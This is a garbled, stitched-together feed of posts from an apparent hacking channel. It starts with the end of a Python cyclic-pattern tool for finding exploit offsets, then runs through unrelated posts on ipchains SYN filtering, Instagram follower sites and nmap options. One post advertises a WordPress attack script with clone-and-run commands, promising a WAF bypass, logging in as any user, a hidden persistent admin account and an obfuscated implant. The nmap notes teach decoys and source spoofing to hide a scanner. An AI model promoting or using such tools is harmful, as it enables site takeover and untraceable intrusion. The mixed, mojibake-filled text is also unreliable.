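MAX_PATTERN_LENGTH = len(_FULL)


def pattern_gen(length: int) -> str:
    """Return the first `length` characters of the cyclic pattern."""
    if length < 0 or length > MAX_PATTERN_LENGTH:
        raise ValueError(f"length must be between 0 and {MAX_PATTERN_LENGTH}")
    return _FULL[:length]


def _hex_to_text(value: str) -> str:
    """Decode '0x42346642' into the bytes as they sat in memory on a little-endian CPU."""
    digits = value[2:]
    if len(digits) % 2:
        digits = "0" + digits
    raw = bytes.fromhex(digits)
    return raw[::-1].decode("ascii", errors="replace")


def pattern_search(needle: str) -> int:
    """Offset of `needle` in the pattern, or -1 if it does not occur.

    Accepts either a text fragment ('Bf4B') or a hex register value
    ('0x42346642'); the hex form is byte-reversed (little-endian) first.
    If the reversed form is absent, the big-endian reading is tried too,
    which covers a value captured from a big-endian target.
    """
    if needle.lower().startswith("0x"):
        little = _hex_to_text(needle)
        pos = _FULL.find(little)
        if pos == -1:
            pos = _FULL.find(little[::-1])
        return pos
    return _FULL.find(needle)


if __name__ == "__main__":
    print(pattern_gen(100))
    for query in ("Bf4B", "0x42346642"):
        print(f"Pattern {query} first occurrence at position {pattern_search(query)} in pattern.")
```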
@underCodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ New 2020 WordPress hack script for Linux/Termux :
T.me/UnderCodeTesting
> Features:
1) Bypass WAF (web application firewall)
2) Hidden/stealth
3) Lets you log in as any user
4) Dump all user entries
5) Create a persistent, hidden admin account
6) Obfuscated implant
7) Multi-functionality
π¦ πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/shadowlabscc/ProjectOpal.git
2) cd ProjectOpal
3) python opal.py
@underCodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 popular Instagram sites - trials - no passwords required :
THESE ARE THE MOST POPULAR, BUT NOT TESTED BY UNDERCODE :
fb.com/underCodeTesting
> https://famoid.com/buy-instagram-followers/
> https://www.followerpackages.com/buy-instagram-followers/
> https://www.genuinelikes.com/buy-instagram-followers.php
> https://www.getrealboost.com/buy-real-instagram-followers/
> https://krootez.com/buy-real-instagram-followers/
> https://buyiglikesfast.com/
> https://cheapigfollowers.com/
> https://friendlylikes.com/
> https://brsm.io/buy-real-active-instagram-followers/
π¦ There are also 100000 other sites, but we chose the most popular services
π¦ If a site's trial is not available, try again after a few hours :)
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Enhance network security with SYN packet characteristics, by UnderCode :
twitter.com/UnderCodeNews
π¦ ππΌππ πππΈβπ :
1) Consider the following situation: the internal network is 198.199.1.0, and a Linux box is used as the router and firewall connecting it to the Internet. On the firewall, eth0 is connected to the external network and eth1 to the internal network.
2) For the security of the www service, the following set of ipchains rules is set:
ipchains -A input -p tcp -s 198.199.1.0/24 1024: -d 0.0.0.0/0 www -i eth1 -j ACCEPT
3) ipchains -A input -p tcp -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT
4) With the above settings, only internal users with source ports above 1024 (unprivileged ports) are allowed to access www hosts on the Internet. In other words, a port greater than 1024 on an intranet host and port 80 on an Internet host are allowed to establish a connection. But notice that this also allows hosts on the Internet to use port 80 to connect to any port greater than 1024 on your intranet hosts. From this we can see that the system has a security risk, because many services listen on ports greater than 1024. So how do we remove this hidden danger? We can use the characteristics of the SYN packet to eliminate it.
5) First let's look at the flag bits in the TCP segment header. TCP has six flags: URG, ACK, PSH, RST, SYN and FIN. Let's focus on the ACK, SYN and FIN flags.
6) ACK: indicates whether the acknowledgment number is valid; 1 means valid, 0 means the acknowledgment number is invalid. The acknowledgment number refers to the next byte expected to be received, not the byte previously received. It follows that ACK is always 0 in the packet that initiates the connection request (that is, the first packet) and always 1 in all subsequent packets.
7) SYN: used to establish a connection. In the connection request SYN = 1, and in the connection request confirmation SYN = 1 as well. Therefore SYN stands for CONNECTION REQUEST and CONNECTION ACCEPTED. In all subsequent TCP packets SYN is set to zero.
FIN: used to tear down the connection.
8) The above can be summarized in the following table:
ACK flag   SYN flag   Meaning of the TCP packet
0          1          connection request
1          1          connection request confirmation (accept the connection request)
1          0          confirmation of the connection request confirmation
1          0          data packet
...        ...
9) What we call a SYN packet is a connection request packet. As shown above, a SYN packet has the following characteristics: SYN = 1, ACK = 0, FIN = 0. Therefore, to filter connection request packets, it is only necessary to filter out SYN packets.
10) In ipchains, we can specify SYN packets like this:
-p tcp -s x.x.x.x/x -y
For example, all SYN packets from 192.168.1.0/24 can be matched like this:
-p tcp -s 192.168.1.0/24 -y
We can also prefix -y with ! to match all non-SYN packets:
-p tcp -s x.x.x.x/x ! -y
π¦ So, in the above example, we can enhance the security of the network like this:
ipchains -A input -p tcp -s 198.199.1.0/24 1024: -d 0.0.0.0/0 www -i eth1 -j ACCEPT
ipchains -A input -p tcp ! -y -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT
This prevents hosts on the Internet from using port 80 to initiate connections to ports greater than 1024 on your intranet hosts, while the non-SYN packets of connections opened from the inside are still accepted, thereby enhancing network security.
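To make the difference between the two rule sets concrete, here is an added example (not from the original post) that models the -y match and both ipchains rule sets in Python and evaluates them against constructed packets; 203.0.113.5 is a documentation address standing in for an Internet host.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional

# TCP flag bits as they sit in the flags byte of the header.
FIN, SYN, ACK = 0x01, 0x02, 0x10


def is_syn_packet(flags: int) -> bool:
    """The page's definition of a SYN packet (what ipchains -y matches):
    SYN = 1, ACK = 0, FIN = 0."""
    return bool(flags & SYN) and not flags & ACK and not flags & FIN


def describe(flags: int) -> str:
    """Meaning of the packet from its ACK/SYN bits, following the table above."""
    ack, syn = bool(flags & ACK), bool(flags & SYN)
    if syn and not ack:
        return "connection request"
    if syn and ack:
        return "connection request confirmation"
    if ack:
        return "acknowledgement or data packet"
    return "other"


@dataclass
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    iface: str   # interface the firewall received it on (-i)
    flags: int


@dataclass
class Rule:
    src_net: str
    sports: tuple          # inclusive (low, high); 'www' is (80, 80), '1024:' is (1024, 65535)
    dst_net: str
    dports: tuple
    iface: str
    syn: Optional[bool]    # True = -y, False = ! -y, None = flag not checked
    target: str = "ACCEPT"

    def matches(self, p: Packet) -> bool:
        if p.iface != self.iface:
            return False
        if ip_address(p.src) not in ip_network(self.src_net):
            return False
        if ip_address(p.dst) not in ip_network(self.dst_net):
            return False
        if not (self.sports[0] <= p.sport <= self.sports[1]):
            return False
        if not (self.dports[0] <= p.dport <= self.dports[1]):
            return False
        if self.syn is not None and is_syn_packet(p.flags) != self.syn:
            return False
        return True


def evaluate(chain: list, p: Packet, policy: str = "DENY") -> str:
    """First matching rule wins, like an ipchains chain; otherwise the chain policy."""
    for rule in chain:
        if rule.matches(p):
            return rule.target
    return policy


OUTBOUND = Rule("198.199.1.0/24", (1024, 65535), "0.0.0.0/0", (80, 80), "eth1", None)
# Original inbound rule: accepts anything from port 80 to a high port.
INBOUND_ORIGINAL = Rule("0.0.0.0/0", (80, 80), "198.199.1.0/24", (1024, 65535), "eth0", None)
# Hardened inbound rule: the same, but only for non-SYN packets (! -y).
INBOUND_HARDENED = Rule("0.0.0.0/0", (80, 80), "198.199.1.0/24", (1024, 65535), "eth0", False)

ORIGINAL_CHAIN = [OUTBOUND, INBOUND_ORIGINAL]
HARDENED_CHAIN = [OUTBOUND, INBOUND_HARDENED]

# Constructed packets; 203.0.113.5 is a documentation address standing in for an Internet host.
REQUEST = Packet("198.199.1.10", 3000, "203.0.113.5", 80, "eth1", SYN)        # intranet opens a web connection
REPLY = Packet("203.0.113.5", 80, "198.199.1.10", 3000, "eth0", SYN | ACK)    # the server's answer to it
PROBE = Packet("203.0.113.5", 80, "198.199.1.10", 6000, "eth0", SYN)          # Internet host opening a connection from port 80


if __name__ == "__main__":
    for name, pkt in (("request", REQUEST), ("reply", REPLY), ("probe", PROBE)):
        print(f"{name:8s} {describe(pkt.flags):32s} "
              f"original={evaluate(ORIGINAL_CHAIN, pkt)} hardened={evaluate(HARDENED_CHAIN, pkt)}")
```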
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Full UnderCode Tutorial: Nmap Network Security Scanner Instructions
PART 1
instagram.com/underCodeTestingCompany
π¦ ππΌππ πππΈβπ :
-i
Read the targets from the specified file instead of from the command line. The file can hold a list of hosts or networks separated by spaces, tabs or newlines. If you want to read from standard input, for example at the end of a pipe, use a hyphen (-) as the file name. You can find more information on writing this file under the target specification.
-p
Specifies the ports you want to scan. For example, '-p 23' will probe only port 23 of the host. By default the scan covers ports 1 to 1024, as well as the ports listed in the services file that comes with nmap.
-F
Fast scan mode. Specifies that you only want to scan the ports listed in the services file provided with nmap. This is obviously much faster than scanning all 65535 ports.
-D
This is a scan with decoys. All the decoy addresses you specify will be recorded in the remote host's connection log. Its records will show that port scans were initiated from several IPs, but it cannot tell which is the real IP and which ones are used as cover. This defeats some route-based tracing, so it is a very practical technique for hiding your IP. Separate each decoy address with a comma. You can put 'ME' at any position where you want the real IP to appear. If you put 'ME' in the sixth place or even last, some port scan loggers (such as Solar Designer's excellent scanlogd) may not show your IP at all; if you don't use 'ME', nmap places it randomly. Remember that the hosts you use as decoys must be up, or you may end up half-open (SYN) flooding your target; besides, it is fairly easy to tell the real intruder from a bunch of IP addresses that are actually down. You may also want to use IP addresses instead of names, so that the host's nameserver logs will not record you. Also remember that some (stupid) "port scan detectors" will refuse connections from hosts that attempt port scans. In this way you may inadvertently cause the host you scanned to lose connectivity with the decoy hosts, which can be a big problem if a decoy host is the network's gateway or even localhost: that machine will be cut off as well! So you had better use this parameter carefully, and for ethical reasons too: it is just a deception, isn't it? Decoys are used in the initial ping scan (ICMP, SYN, ACK or other) and in the actual port state scan. They are also used for remote OS identification (-O). Of course, if you use too many decoy addresses it is useless: it only slows down the scan and reduces accuracy. And some ISPs may filter out your spoofed packets, although most (almost all) place no restrictions on spoofed packets.
-S
In some cases nmap may not be able to determine your source address; nmap will tell you when this happens, and then you need to use -S with your IP address to specify it. Another possible use is to make the target think that someone else is scanning it. Imagine a company finding itself constantly scanned by a competitor :). This is an unsupported usage, or rather not the main purpose; I mention it only to remind people not to blame the apparent source when they find a port scan, since that host may be innocent. -e is generally needed with this parameter.
-e
Tells nmap which interface to send and receive on. nmap can usually detect it automatically; if it cannot, it will prompt you.